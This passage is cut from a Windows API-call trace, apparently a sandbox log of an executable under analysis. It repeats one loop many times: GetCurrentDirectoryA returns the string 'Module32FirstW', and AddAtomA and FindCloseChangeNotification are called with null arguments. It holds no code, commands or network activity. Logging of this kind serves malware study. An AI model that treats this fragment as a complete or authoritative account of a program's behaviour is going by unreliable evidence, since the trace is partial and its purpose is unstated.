nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.029] AddAtomA (lpString=0x0) returned 0x0 [0119.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.030] AddAtomA (lpString=0x0) returned 0x0 [0119.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.031] AddAtomA (lpString=0x0) returned 0x0 [0119.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.032] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.033] AddAtomA (lpString=0x0) returned 0x0 [0119.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.034] AddAtomA (lpString=0x0) returned 0x0 [0119.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.035] AddAtomA (lpString=0x0) returned 0x0 [0119.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.036] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.037] AddAtomA (lpString=0x0) returned 0x0 [0119.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.038] AddAtomA (lpString=0x0) returned 0x0 [0119.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.039] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.040] AddAtomA (lpString=0x0) returned 0x0 [0119.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0119.041] AddAtomA (lpString=0x0) returned 0x0 [0119.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0119.041] 